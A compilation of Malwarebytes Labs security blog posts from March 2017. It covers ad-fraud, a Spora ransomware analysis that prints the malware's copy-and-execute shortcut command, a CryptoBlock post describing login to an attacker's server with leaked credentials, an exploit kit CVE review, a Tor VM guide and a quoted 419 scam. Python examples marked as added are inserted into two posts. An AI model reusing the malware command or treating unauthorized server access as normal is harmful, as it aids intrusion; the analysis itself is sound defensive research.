Techie Feeds

Adware vs. Ad-fraud

Malwarebytes - Mon, 03/13/2017 - 18:18

Adware and ad-fraud are in the same business, and neither cares very much how it makes money as long as it keeps pouring in. But there are some major differences. To understand them, it is worth looking at each entity separately.


Adware: any software application that shows advertisements while one of the components of the adware is running. The word is a contraction of advertising and software, and adware is often simply regarded as “advertising-supported freeware”.

This is the well-known trade-off of not having to pay for your software and having to look at some advertisements in return. While this simple business model may appeal to many of us, there are definitely boundaries. We draw lines at the number of advertisements, the moment and the way they are presented to us (consider e.g. in-game advertising), and the kind of advertisements (e.g. pop-ups of an adult nature may give those looking over your shoulder the wrong idea).

There are also some criteria that security vendors take into consideration when classifying adware:

  • Do the advertisements disappear when you uninstall the software they came with?
  • Was the user given a warning and a chance to opt-out during install?
  • What is the nature of the changes the adware makes on the affected system?
  • How easy is it to remove under normal circumstances?
  • What is the impact on the user’s privacy?
  • Does the adware grab permissions to update itself or install other similar programs?

This is why you will see (most) adware classified as potentially unwanted programs (PUPs), some as spyware, and others could even be classified as Trojans.


Ad-fraud: a type of fraud that makes advertisers pay for advertisements even though the number of impressions (the times that the advertisement has been seen) is enormously exaggerated. There are many different methods to achieve this:

  • SEO fraud – sites are artificially made to appear very popular, so advertisers will pay high prices for advertisements nobody may ever see.
  • Stacking or stuffing – sites are filled with lots of advertisements, sometimes on top of each other, or sometimes only one pixel big. When someone visits the site, all the advertisements register one impression.
  • Domain spoofing – the site where the advertisement is placed is a different one than the advertiser expected. He pays a high price for a site with low or no traffic.
  • Click-fraud – systems that are part of a botnet or have some other Trojan infection are sent to visit a site (or click on a URL). Despite the number of impressions, the return value of the click is very low. The chance that the potential customer is mad at you is bigger than the chance he’ll buy something.

The malware involved in this type of fraud is usually classified as a Trojan, as the systems are remotely controlled and told to visit a site (to heighten its popularity) or click a URL (to register an impression). As you can imagine, hiring a botnet to do these tasks for you is a lot cheaper than owning and running large server farms, although this happens as well. Sometimes they instead pay people in low-income countries to do micro-tasks for micro-payments.


So, we have seen that both adware and ad-fraud earn their money in the advertising business. But the means are very different. While the main victims of adware are the users who may have knowingly installed advertising-supported software, in the case of ad-fraud the main victims are the advertisers, even though there might be unsuspecting users running click-bots or multi-purpose bots.


Pieter Arntz

The post Adware vs. Ad-fraud appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: Spora ransomware

Malwarebytes - Fri, 03/10/2017 - 18:00

Nowadays, ransomware has become the most popular type of malware. Most of the new families are prepared by amateurs (script-kiddies) and are distributed on a small scale. There are only a few major players on this market that are prepared by professionals. Recently, Spora ransomware joined this set. As we will see, some of its elements suggest that there is a well-prepared team of criminals behind it.

Spora got some hype of being a ransomware that can encrypt files offline. In fact, this concept is nothing novel – we already saw many ransomware families that can do the same. For example DMA Locker 3.0, Cerber, or some newer editions of Locky. However, it has some other features that make it interesting.

Analyzed samples

Distribution method

Spora is distributed in various ways – from phishing e-mails (described here) to infected websites dropping malicious payloads.

Some examples of the distribution method used by this ransomware are described here (the campaign from 14.02.2017) and here (the campaign from 06.03.2017).

Behavioral analysis

After being deployed, Spora ransomware runs silently and encrypts files with selected extensions. Then, it attempts to redeploy itself with elevated privileges. No UAC bypass mechanism is used – instead, the UAC popup appears repeatedly until the user accepts it:

Then, it deploys another system tool – vssadmin, for deleting shadow copies:

It doesn’t even try to be silent – a command-line window is displayed.

It also drops its own copy into the C: directory. Several modifications are made to the settings of existing folders. First of all, Spora disables the arrow icon that indicates shortcuts. It then marks all existing folders as hidden and creates a shortcut to each of them. The shortcut not only opens the original folder but also runs the dropped malware sample.

Example of a command, deployed when the user clicks on the shortcut:

C:\Windows\C:\Windows\system32\cmd.exe /c start explorer.exe "Program Files" & type "81d59edde88fc4969d.exe" > "%temp%\81d59edde88fc4969d.exe" && "%temp%\81d59edde88fc4969d.exe"

Spora doesn’t change filenames, nor does it add extensions. Each file is encrypted with a separate key (files with the same plaintext are encrypted to different ciphertexts). Encrypted content has high entropy and no visible patterns, which suggests a stream cipher or chained blocks (probably AES in CBC mode).

Visualization of a file – before and after encryption:


The malware drops related files in several locations. The following files can be found in %APPDATA%.

The file with the .KEY extension and a ransom note in HTML format are also dropped on the Desktop:

The .KEY file contains encrypted data about the victim that needs to be uploaded later to the attacker’s website for the purpose of synchronizing the status of the victim.

When the encryption finishes, a ransom note pops up. In the first analyzed cases it was in Russian. However, other language versions also exist – for example, the English note given below:

The content of the .KEY file is Base64 encoded and stored as a hidden field inside the ransom note:

In newer versions (#2) the .KEY file is not dropped at all, and the full synchronization with the remote server is based on its equivalent submitted automatically as the hidden field. This shows the second step in the evolution of this ransomware – making the interface even simpler and more accessible.

Website for the victim

The ransomware itself does not look sophisticated, except for its website for the victim and the internals of the .KEY file (or its Base64 equivalent). In older versions, the user was asked to upload the .KEY file to the website, from which all of his/her private information is retrieved, i.e. username, infection date, status, etc.

In newer versions, there is no need to upload anything – when the user clicks the link in the ransom note, the Base64 content containing all the data is submitted automatically.

Some information is also encoded inside the victim ID: country code (first two characters), hash, and statistics about encrypted file types (how many files of each category have been encrypted: office document, PDF, Corel Draw, DB, image, archive). You can find a decoder here.

Another step taken by authors to provide a user-friendly interface is the fact that the site (although hosted as a hidden service) does not require users to download a Tor browser, like most of the ransomware, but instead, provides a convenient gateway at


The Spora executable comes packed in various crypters. It has also been observed distributed in bundles with other malware. In case #1, after defeating the first encryption layer, we find two UPX-packed payloads. They can be unpacked with the standard UPX application. As a result, we get samples that are not further obfuscated. In the mentioned case, Spora ransomware was distributed along with a malicious downloader (38e645e88c85b64e5c73bee15066ec19) similar to the one described here. (Since this article is dedicated to Spora ransomware only, the second payload will not be further described.)

Execution flow

Spora’s execution path varies depending on the parameter with which it has been deployed. On its initial run it is executed without any parameter. Then, the basic steps are the following:

1. Create mutex (pattern: m<VolumeSerialNumber:decimal>)

2. Decrypt AES protected data stored in the binary (i.e. RSA public key, ransom note, sample ID)

3. Search files with the attacked extensions. Make a list of their paths and statistics of the types.

4. Generate RSA key pair (one per victim)

5. Encrypt files with the selected extensions

After completing these operations, Spora redeploys its own binary – this time with Administrative privileges (causing a UAC alert to pop up). It passes the parameter ‘\u’ on the command line, which modifies the execution path.

Some of the steps that are executed in such case are:

1. Delete shadow copies

2. Modify lnkfile settings (in order to hide the arrow added by default to indicate a shortcut – more about its purpose is described in the section “Behavioral analysis”)

3. Drop its own copy and the ransom note on every drive

4. Deploy explorer displaying the ransom note

What is attacked?

Spora ransomware attacks the following extensions:

xls doc xlsx docx rtf odt pdf psd dwg cdr cd mdb 1cd dbf sqlite accdb jpg jpeg tiff zip rar 7z backup sql bak

They are grouped in several categories, used to build statistics for the attackers. The categories can be described as such: office documents, PDF/PPT documents, Corel Draw documents, database files, images, and archives:

Several system directories are excluded from the attack:

  • windows
  • program files
  • program files (x86)
  • games

How does the encryption work?

The encryption used by Spora ransomware is complex and layered. It uses the Windows Crypto API. The executable comes with two hardcoded keys: an AES key – used to decrypt elements hardcoded in the binary – and an RSA public key – used to encrypt keys generated on the victim’s machine.

In addition to operations related to encrypting the victim’s files, Spora uses the Windows Crypto API for other purposes – i.e. to encrypt temporary data, and to decrypt some elements stored in the binary.

First, it creates a file in %APPDATA% – the filename is the Volume Serial Number. This file is used for temporarily storing information.

The temporarily stored information is encrypted with the help of the function CryptProtectData:

It includes, i.e., the list of the files to be encrypted (with extensions matching the list):

The malware sample comes with a hardcoded key that is being imported:

It is an AES-256 key, stored in the form of a blob. Explanation of the fields in the Blob Header:

08 - PLAINTEXTKEYBLOB - key is a session key
02 - CUR_BLOB_VERSION
0x00006610 - AlgID: CALG_AES_256
0x20 - 32 - key length

The AES key is used for decrypting another key, stored in a binary – that is an RSA public key:

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC6COfj49E0yjEopSpP5kbeCRQp
WdpWvx5XJj5zThtBa7svs/RvX4ZPGyOG0DtbGNbLswOYKuRcRnWfW5897B8xWgD2
AMQd4KGIeTHjsbkcSt1DUye/Qsu0jn4ZB7yKTEzKWeSyon5XmYwoFsh34ueErnNL
LZQcL88hoRHo0TVqAwIDAQAB
-----END PUBLIC KEY-----

After that, the same AES key is imported again and used to decrypt other elements:

  • The ransom note in HTML format:

  • A hardcoded ID of the sample:


For every victim, Spora locally creates a fresh pair of RSA keys. Below you can see a fragment of the code generating the new RSA key pair (1024 bit):

Explanation of the parameters:

0xA400 - AlgId: CALG_RSA_KEYX
0x04000001 - RSA1024BIT_KEY | CRYPT_EXPORTABLE
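To make the blob header fields and the CryptGenKey parameters above concrete, here is an added Python example (not code from the original post, nor Spora’s own). It parses a Windows CryptoAPI PLAINTEXTKEYBLOB the way an analyst would when carving such a key out of a sample, checks that the declared key length fits the algorithm, and splits the CryptGenKey dwFlags value into key size and flag bits. The sample blob is constructed to match the header bytes described in the analysis; its 32 key bytes are dummy values, not a real key.

```python
"""Parse a CryptoAPI PLAINTEXTKEYBLOB and decode CryptGenKey flags (added example)."""
import struct

# BLOBHEADER from wincrypt.h: BYTE bType, BYTE bVersion, WORD reserved, ALG_ID aiKeyAlg
BLOBHEADER = struct.Struct("<BBHI")
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
CRYPT_EXPORTABLE = 0x00000001

# Subset of ALG_ID values relevant to this analysis
ALG_NAMES = {
    0x6610: "CALG_AES_256",
    0x660F: "CALG_AES_192",
    0x660E: "CALG_AES_128",
    0xA400: "CALG_RSA_KEYX",
    0x2400: "CALG_RSA_SIGN",
}
# Key length (bytes) a PLAINTEXTKEYBLOB must carry for each AES ALG_ID
EXPECTED_KEY_LEN = {0x6610: 32, 0x660F: 24, 0x660E: 16}


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Return the header fields and raw key of a PLAINTEXTKEYBLOB; raise ValueError if malformed."""
    if len(blob) < BLOBHEADER.size + 4:
        raise ValueError("blob too short for BLOBHEADER + key length")
    btype, bversion, _reserved, alg_id = BLOBHEADER.unpack_from(blob, 0)
    if btype != PLAINTEXTKEYBLOB:
        raise ValueError(f"not a PLAINTEXTKEYBLOB (bType=0x{btype:02x})")
    if bversion != CUR_BLOB_VERSION:
        raise ValueError(f"unexpected blob version {bversion}")
    # A PLAINTEXTKEYBLOB follows the header with a DWORD key length and the key bytes
    (key_len,) = struct.unpack_from("<I", blob, BLOBHEADER.size)
    key = blob[BLOBHEADER.size + 4 : BLOBHEADER.size + 4 + key_len]
    if len(key) != key_len:
        raise ValueError("declared key length exceeds blob size")
    expected = EXPECTED_KEY_LEN.get(alg_id)
    if expected is not None and key_len != expected:
        raise ValueError(f"key length {key_len} does not match {ALG_NAMES[alg_id]}")
    return {
        "alg_id": alg_id,
        "alg_name": ALG_NAMES.get(alg_id, f"0x{alg_id:04x}"),
        "key_len": key_len,
        "key": key,
    }


def decode_gen_key_flags(flags: int) -> dict:
    """CryptGenKey dwFlags: upper 16 bits = key size in bits, lower 16 bits = flag bits."""
    return {"key_bits": flags >> 16, "exportable": bool(flags & CRYPT_EXPORTABLE)}


# Constructed sample: the header bytes from the analysis followed by a dummy 32-byte key
SAMPLE_BLOB = bytes([0x08, 0x02, 0x00, 0x00, 0x10, 0x66, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00]) + bytes(range(32))

if __name__ == "__main__":
    info = parse_plaintext_key_blob(SAMPLE_BLOB)
    print(info["alg_name"], info["key_len"])        # CALG_AES_256 32
    print(decode_gen_key_flags(0x04000001))          # {'key_bits': 1024, 'exportable': True}
```

The length check matters in practice: a blob whose declared key length disagrees with its ALG_ID is either corrupted or not the key you think it is, which is worth knowing before spending time trying to decrypt the hardcoded resources with it.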

The private key from the generated pair is exported and Base64 encoded:

The formatted version of the private key is stored in a buffer – along with the collected data about the machine and the infection, including: date, username, country code, malware sample ID, and statistics of encrypted file types.


Then, another AES key is generated. It is exported and encrypted with the public RSA key that was hardcoded in the sample. Below – encrypting the exported AES key blob:

The generated AES key is used to encrypt the victim’s data (including the private key from the generated pair):

The prepared encrypted content is merged into one data block. First, the AES-encrypted victim’s data is copied. After that follows the RSA-encrypted AES key (selected in the picture below):

This merged data is stored in the .KEY file (or in the hidden, Base64-encoded content in the ransom note). It needs to be uploaded to the server by the victim – that’s how the attackers get access to the data necessary to decrypt files after the ransom is paid.

Spora does not change files’ extensions, so it needs some other method of identifying whether or not an individual file is already encrypted. It does this by reading fragments of the content.

As we can see above, the 132 bytes at the end of the file are reserved for the data stored by Spora: a 128-byte-long AES key followed by its 4-byte-long CRC32. In order to decide whether the file is encrypted or not, the data at the file’s end is read and the saved CRC32 is compared with the computed CRC32 of the 128 bytes read. If the check passes, Spora finishes processing the file. Otherwise, it proceeds with the encryption:

For each file, a new, individual AES key is generated. It is used to encrypt the mapped file content. The exported representation of the individual key is encrypted with the previously generated RSA key and then stored at the end of the encrypted file. After that, its CRC32 is computed and also stored at the end.
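The check described above can be reproduced as a triage script. The following added Python example (not code from the original post) reads only the last 132 bytes of a file and reports whether the stored CRC32 matches the CRC32 of the 128 bytes before it, which is the marker Spora uses to recognise files it has already processed; a responder can use the same marker to inventory which files in a tree were touched, since the unchanged filenames give no clue. The 128 + 4 byte layout and the extension list come from the analysis; the little-endian storage of the CRC and the sample files are assumptions and constructed data.

```python
"""Inventory files carrying Spora's 132-byte trailer (added example, defensive triage)."""
import os
import tempfile
import zlib

KEY_BLOB_LEN = 128          # RSA-encrypted per-file AES key blob (from the analysis)
CRC_LEN = 4                 # CRC32 of the 128 bytes above (from the analysis)
TRAILER_LEN = KEY_BLOB_LEN + CRC_LEN

# Extensions Spora targets, as listed in the analysis
SPORA_EXTENSIONS = {
    "xls", "doc", "xlsx", "docx", "rtf", "odt", "pdf", "psd", "dwg", "cdr", "cd",
    "mdb", "1cd", "dbf", "sqlite", "accdb", "jpg", "jpeg", "tiff", "zip", "rar",
    "7z", "backup", "sql", "bak",
}


def has_spora_trailer(tail: bytes) -> bool:
    """True if the last 4 bytes equal the CRC32 of the 128 bytes preceding them.

    Byte order of the stored CRC is assumed little-endian (not stated in the analysis).
    """
    if len(tail) < TRAILER_LEN:
        return False
    trailer = tail[-TRAILER_LEN:]
    key_blob, stored = trailer[:KEY_BLOB_LEN], trailer[KEY_BLOB_LEN:]
    return (zlib.crc32(key_blob) & 0xFFFFFFFF) == int.from_bytes(stored, "little")


def read_tail(path: str) -> bytes:
    """Read only the last TRAILER_LEN bytes so large files are not loaded whole."""
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        size = fh.tell()
        fh.seek(max(0, size - TRAILER_LEN))
        return fh.read()


def scan_directory(root: str, extensions=SPORA_EXTENSIONS) -> list:
    """Return paths under root with a targeted extension whose tail passes the CRC check."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            ext = os.path.splitext(name)[1].lower().lstrip(".")
            if ext not in extensions:
                continue
            path = os.path.join(dirpath, name)
            try:
                if has_spora_trailer(read_tail(path)):
                    hits.append(path)
            except OSError:
                continue        # unreadable file: skip it rather than abort the sweep
    return hits


def make_marked_sample(body: bytes) -> bytes:
    """Constructed test fixture: body + dummy 128-byte blob + its CRC32. No real encryption."""
    blob = bytes((i * 7) & 0xFF for i in range(KEY_BLOB_LEN))
    return body + blob + (zlib.crc32(blob) & 0xFFFFFFFF).to_bytes(CRC_LEN, "little")


PLAIN_SAMPLE = b"Quarterly report, constructed sample text.\n" * 20
MARKED_SAMPLE = make_marked_sample(b"\x8f\x12\x3a\xc4" * 64)


def demo_scan() -> list:
    """Write the constructed samples to a temp dir and return the basenames flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in (("report.docx", PLAIN_SAMPLE),
                           ("scan.jpg", MARKED_SAMPLE),
                           ("notes.txt", MARKED_SAMPLE)):   # .txt is not targeted, so not scanned
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return sorted(os.path.basename(p) for p in scan_directory(tmp))


if __name__ == "__main__":
    print(demo_scan())      # ['scan.jpg']
```

A random 132-byte tail passes this check with probability 2^-32 per file, so a hit on a single file is not proof, but across a tree it gives a reliable list of what to restore from backup. The list is an inventory only; as the analysis notes, the per-file key at the end of the file is itself RSA-encrypted and does not help with decryption.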


Spora is an interesting ransomware, surely created by authors with programming experience. However, the code is not obfuscated and the execution is very noisy in comparison to other malware – this may suggest that the authors are not professional malware designers (in contrast to, e.g., the authors of Cerber).

The cryptography implementation used seems to have no flaws that would allow decrypting attacked files without paying the ransom, so we recommend focusing on prevention. Users with Malwarebytes 3.0 installed will be protected from Spora ransomware. While there currently is no decryption for those infected, we suggest keeping a backup of the infected files, as there might be a decrypter in the future.

Appendix – Spora ID decoder – Bleeping Computer about Spora

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post Explained: Spora ransomware appeared first on Malwarebytes Labs.


CryptoBlock ransomware and its C2

Malwarebytes - Fri, 03/10/2017 - 16:00

CryptoBlock is an interesting ransomware to keep an eye on. We expect this ransomware, which is still in development, to eventually turn into a RaaS (Ransomware as a Service).

Since the ransomware seems to be in development, we decided there might be some weak points and investigated whether we could find one. Even though it is still being developed into a RaaS, it seems users have already been infected by this variant somehow.

After getting the name CryptoBlock, we decided to check VirusTotal to see how many droppers for it we could find there, as well as to get some information on the ransomware. Finding a single dropper on VirusTotal, I noticed it was contacting the domain to send a key and also to get a BTC wallet.

By going to this domain directly, we can see that the threat actor has left a note for interested, criminal consumers that the RaaS should be up and running soon.

Even with the RaaS not up and running yet, it’s obvious that the ransomware itself was already fully working for the threat actor, and they either had made a few early victims or they ran it on some test computers.

At this point, we decided to run a static analysis on the EXE. Seeing that .NET DLLs were called in the VirusTotal report, we knew it was written in C# or VB. So we opened the EXE in dnSpy, only to find that it was completely obfuscated with ConfuserEx, which is very hard to unravel, especially when it comes to the later versions.

Given the fact that we had a server to work with from previous research, I decided to start on that side, before going through a painstaking de-obfuscation process.

In the server we found some weird entries, pointing to what seemed to be a “Learn PHP game”.

After searching for a number of these filenames, it didn’t take long before we came across a Pastebin example of one of these PHP pages. It was quite crude, but it was exactly what we were hoping to find.

Using this newfound information, we were able to look at a copy of the config.php file on the server.

Uh oh! What’s that? Those are the complete master credentials (username and password) to the entire CryptoBlock server, valid for every email, database, SSH, cPanel, and more. Having this information, we went to the site’s cPanel interface and got the login page as such:


Typing in the shiny new credentials gave us all we ever wanted for Christmas…complete access to a threat actor’s overseas server.

We have made copies of all databases, the PHP files, and the personal information used to rent the server.

Looking through the personal information, it became sadly obvious the hosting company didn’t require much more information than an email address to host this server. This email address turned out to be a fake one.

Let’s look at some of the stats for the server that were recovered from the apache logs and presented through statistics graphs.


One notable thing we can learn from these statistics is that this ransomware may have affected quite a few people. But even more interesting to us, it shows that a few IP addresses from Europe have been visiting this server by the thousands since it was brought up. There is a huge chance that these IPs are the real IPs of the threat actor owning this server and were logged while they were performing their tests. This is further supported by the fact that the most used part of the site is a PHP page used by the debug build of the ransomware server: checkaction.php.

Weirdly, the threat actor seems to have a database full of stolen credentials from “Pay for Porn” sites besides the database the ransomware uses.

Here is an example of the first page of the database tables used by the ransomware for IDs, BTC addresses, payments, and keys.

Another interesting fact we found is that the threat actor applied for a Blockchain API account, and was denied.

The threat actor is also distributing an exploitable Ammyy Admin executable from the server. It seems they may either be scamming people into letting them onto the machine remotely, or simply running it silently as a malicious drive-by. The file on the server is called test.exe.

We will keep an eye on the developments that this ransomware and the server will go through and try to keep you posted on any significant changes.

As far as protection from this threat though, if you are using Malwarebytes 3.0 with Anti-Ransomware technology, you are going to be protected from this ransomware at numerous levels, so please make sure you utilize it or a similar solution.

The post CryptoBlock ransomware and its C2 appeared first on Malwarebytes Labs.


Exploit kits: Winter 2017 review

Malwarebytes - Thu, 03/09/2017 - 20:08

A few months have passed since our Fall 2016 review of the most common exploit kits we are seeing in our telemetry and honeypots. Today, we take another look at the current (bleak) EK scene by going over RIG, Sundown, Neutrino and Magnitude.

There haven’t been any major changes over the past few months, and exploit kit-related infections remain low compared to those via malicious spam. This is in part due to the lack of fresh and reliable exploits in today’s drive-by landscape.

Pseudo-Darkleech and EITest are the most popular redirection campaigns from compromised websites. They refer to code that is injected into – for the most part – WordPress, Joomla, or Drupal websites and automatically redirects visitors to an exploit kit landing page.

Malvertising campaigns keep fuelling redirections to exploit kits as well, but can greatly vary in size and impact. The daily malverts from shady ad networks continue unchanged while the larger attacks going after top ad networks and publishers come in waves.

In the following video, we do a quick overview of those exploit kits; if you are interested in the more technical details please scroll down for additional information on each of them.

Most used vulnerabilities

Internet Explorer

  • CVE-2016-0189
  • CVE-2014-6332
  • CVE-2013-2551

Information disclosure

  • CVE-2016-3351
  • CVE-2016-3298
  • CVE-2016-0162


  • CVE-2016-7200
  • CVE-2016-7201


  • CVE-2016-4117
  • CVE-2016-1019
  • CVE-2015-8651
  • CVE-2015-7645


  • CVE-2016-0034

RIG EK remains the most popular exploit kit at the moment, used in both malvertising and compromised-website campaigns. Its primary payloads are ransomware (Cerber and CryptoShield).

The landing page structure (URL and source code) hasn’t really changed, but it is now using a pre-landing page to filter bots and other non-legitimate traffic.

Payload here: Dreambot

Gate (browser check)

Landing page

Sundown EK

Sundown EK keeps on changing its URL patterns, mainly for the Flash exploit and its payload URLs. Sundown is much quieter than RIG EK and for the most part confined to some malvertising campaigns.

Payload here: VenusLocker

Landing page

Neutrino EK

Neutrino EK seems to be the weapon of choice for special malvertising attacks that are difficult to reproduce. It features its usual pre-filtering gate that includes several checks against VMs and security software.

Payload here: Neutrino bot

Filtering gate (fingerprinting)

Landing page

Magnitude EK

Magnitude EK is a very geo-aware exploit kit being restricted to Asia at the moment. It uses decoy finance or bitcoin websites with a special referer to lead to its gate.

Payload here: Cerber

IE exploit

Landing page

Wrap up

There are more exploit kits than just those mentioned in this blog, but some were not included because they were simply copycats or because we have only seen them very sporadically.

Some EKs are indeed quite difficult to reproduce without a proper setup and some previous knowledge of the various traps affiliates and traffers are putting in the way. In other cases, they may fall off the radar until a new campaign (i.e. malvertising) is put in place.

While there hasn’t been a big focus on getting newer exploits integrated, we can note that exploit kit authors are investing some time into better bot detection and evasion, essentially trying to optimize the leads they are getting.

However, we should still be aware that this situation could change as new and powerful exploits can be discovered at any time and come with a ready-to-use proof of concept. For instance, CVE-2017-0037, a vulnerability that affects IE and Edge, is something attackers are likely to integrate soon.

The post Exploit kits: Winter 2017 review appeared first on Malwarebytes Labs.


Torify and analyze traffic for your VM

Malwarebytes - Thu, 03/09/2017 - 18:00

Virtual machines are a great tool for running untrusted software and analyzing its network activity. Most of the time, the default networking configuration uses a bridge to allow VMs to communicate. One caveat of this approach is that both the VM and the host will access the same network (like a personal trusted LAN, for instance…), something definitely not desirable.

Multiple solutions exist to isolate the untrusted VMs from the host LAN. A few years ago we spoke about JanusVM which is no longer maintained and not so easy to set up. A more recent solution uses VirtualBox, Tor, and Whonix alongside Wireshark and is pretty quick to set up without bothering with DHCP or other network protocols.

Whonix is an OS designed to run as a set of VMs with pre-installed and configured applications. Among other features, it uses Tor for all network connections thanks to Whonix-Gateway, a VM dedicated to acting as a gateway between the Whonix VMs and the Tor network.

However, please note that UDP traffic won’t work due to Tor limitations. DNS queries will use the Tor DnsPort on the Whonix-Gateway to avoid leaks.

  1. Download Whonix-Gateway (look for Download Whonix-Gateway link),
  2. Download the associated signature, and the SHA512 file (also provided with its signature),
  3. Check them both,
  4. On VirtualBox, simply import the .ova downloaded above with File > Import Appliance,
  5. Leave the default settings untouched, read and accept the agreement,
  6. Start Whonix-Gateway VM and follow the initial instructions,
  7. You may want to activate the auto-update when prompted,
  8. For the VMs whose traffic you want to redirect, go to Settings, Network and select Internal Network. Set Whonix as the name.
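Steps 2 and 3 above (checking the download against its SHA512 file) can be scripted so the check is not skipped in a hurry. The following added Python example, not code from the original post or from the Whonix project, parses a sums file in the `sha512sum` text format (`<hex digest>  <filename>` per line), streams the image through SHA-512 and reports OK, MISMATCH or MISSING for a downloaded file. The filenames and the sample data it builds are constructed; verifying the OpenPGP signature on the sums file itself is still done with gpg and is not reproduced here.

```python
"""Verify a downloaded image against a sha512sum-format sums file (added example)."""
import hashlib
import hmac
import os
import tempfile


def parse_sha512sums(text: str) -> dict:
    """Map filename -> expected hex digest; tolerates '*' binary markers, blank and comment lines."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 128:      # SHA-512 hex digest is 128 chars
            raise ValueError(f"malformed sums line: {line!r}")
        digest, name = parts
        sums[name.lstrip("*")] = digest.lower()          # '*' prefix = binary mode in sha512sum output
    return sums


def sha512_of_file(path: str) -> str:
    """Stream the file through SHA-512; appliance images are large, so never read them whole."""
    h = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: str, sums_path: str) -> str:
    """Return "OK", "MISMATCH", or "MISSING" (no entry for this filename in the sums file)."""
    with open(sums_path, encoding="utf-8") as fh:
        sums = parse_sha512sums(fh.read())
    expected = sums.get(os.path.basename(path))
    if expected is None:
        return "MISSING"
    actual = sha512_of_file(path)
    return "OK" if hmac.compare_digest(actual, expected) else "MISMATCH"


def demo() -> tuple:
    """Constructed scenario: a good image, a tampered copy, and a file the sums file does not list."""
    with tempfile.TemporaryDirectory() as tmp:
        image = os.path.join(tmp, "Whonix-Gateway.ova")            # hypothetical filename
        with open(image, "wb") as fh:
            fh.write(b"constructed OVA payload\n" * 1000)
        sums_path = os.path.join(tmp, "Whonix-Gateway.sha512sums")  # hypothetical filename
        with open(sums_path, "w", encoding="utf-8") as fh:
            fh.write(f"{sha512_of_file(image)}  Whonix-Gateway.ova\n")
        good = verify_download(image, sums_path)
        # Flip the first byte of the image and re-check
        with open(image, "r+b") as fh:
            fh.seek(0)
            fh.write(b"X")
        bad = verify_download(image, sums_path)
        other = os.path.join(tmp, "Whonix-Workstation.ova")         # hypothetical filename
        with open(other, "wb") as fh:
            fh.write(b"unlisted file\n")
        missing = verify_download(other, sums_path)
    return good, bad, missing


if __name__ == "__main__":
    print(demo())       # ('OK', 'MISMATCH', 'MISSING')
```

MISSING is reported separately from MISMATCH on purpose: a sums file that does not mention the file you downloaded is a sign you fetched the wrong build (or the wrong sums file), which is a different problem from a corrupted or tampered download.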

Once Whonix-Gateway has been configured, you get the following network configuration:

auto eth1
iface eth1 inet static
address
netmask

Thus, you can assign your VMs in the range /18. For instance, the following static IP configuration is used for a first VM:

IP:
Mask:
Gateway:
Primary DNS server:

All the traffic will now be isolated from your host LAN and will use only Tor (including DNS queries). For this setup to work, the Whonix-Gateway has to be up whenever you want to connect one of your VMs.

status page

A visit on from inside a VM using Whonix-Gateway should confirm that the setup is working as expected.

Please keep in mind that this setup should not be trusted to provide serious anonymity guarantees.

Once the VMs are set up, simply install Wireshark or tshark on the Whonix-Gateway. Configure them to listen on eth1… and profit!

Wireshark listening on eth1 on the Whonix Gateway.

The post Torify and analyze traffic for your VM appeared first on Malwarebytes Labs.


“Federal Ministry of Agriculture” 419 spam

Malwarebytes - Wed, 03/08/2017 - 17:55

This is just a short heads up to advise you to ignore the below missive, which is currently landing in mailboxes promising $35 million worth of riches.

From “Dr.Evans Egobia”, with the amazing subject line of “WITH REGARD”S………173.”:


Federal Ministry of Agriculture and Natural Resources
Address FCDA Secretariat, Garki
City Abuja
Phone +[snip]
Fax +[snip]
P.M.B. 135, Garki, Abuja, FCT

Dear Friend
It is with trust and confidence that i write to make this urgent business proposal to you.i was assigned by two of my colleague to seek for a foreign partner who will assist us in providing a convenient foreign account in any designated bank abroad for the transfer of us$35,500,000.00 pending on our arrival in your country for utilization and disbursement with the owner of the account.

this amount results from a deliberate inflation of the value of a contract awarded by our ministry – the federal ministry of agriculture (fma)to an expatriate company.the contract has been executed and payment made to the original contractor,remaining the over-invoiced amount of us$35.5 million,which we want to transfer the funds out the country in ourfavour for disbursement among ourselves.the transfer of this money can only be possible with the help of a foreigner who will be presented as the beneficiary of the fund.

as government officials, we are not allowed to operate foreign accounts,and this is the reason why we decided to contact you. we have agreed that if you/your company can act as the beneficiary of this fund (us$35,500,000.00 million)25% of the total sum will be for you for providing the account while 5% will be set aside for the expenses incurred during the cost of transfer of the fund into your account while 70% will be reserved for us.

we hereby solict for your assistance in providing a convenient account number in a designated bank abroad where this fund would be transferred.we intend coming over there on the completion of this transfer to secureour own share of the money.

please note that we have been careful and have made all arrangements towards the success and smooth transfer of the fund to your acccount beforeyou. for security reasons and confidenciality of this transaction, we demand that you should not expose this proposal and the entire transaction to anybody.

we are putting so much trust in you with the hope that you would not betray us. or sit on this money when it is finally transferred into your account.berest assured that this transaction is 100% risk free. if this proposal is acceptable to you,indicate your interest by sending a email to us including your bank name & address,account number,telephone and fax

note:our former president olusegun aremu obasanjo collaborated with the former chairman of the economic financial crime commission , mallam nuhun ribadu to stop the junior ranks officers from transferring funds out of the country. he sent different publication to many countries in the world as propaganda to discourage all government officials from transferring funds into an overseas account to avoid and save guides the countries economy.

apparently, so that other government officials will not benefits from these( oil windfalls venture) where he has been a culprit alone with his aides.more details about this transaction will be given to you as soon as we receive your positive respond.
note that the particular nature of your company’s business is irrelevant to this transaction. if this transaction interests you, your urgent response will be appreciated.
yours faithfully,
Dr.Evans Egobia

Reply to [snip]

This is a pretty straightforward 419 scam, which will likely turn into a money mule situation for the unlucky participant. Pieces of this email have been rattling around for some years now, and one would hope at least some potential victims would go Googling before firing off a response. Feel free to delete this scam message the moment you see it land in your mailbox – this definitely isn’t the get-rich-quick scheme you were hoping for.

Christopher Boyd

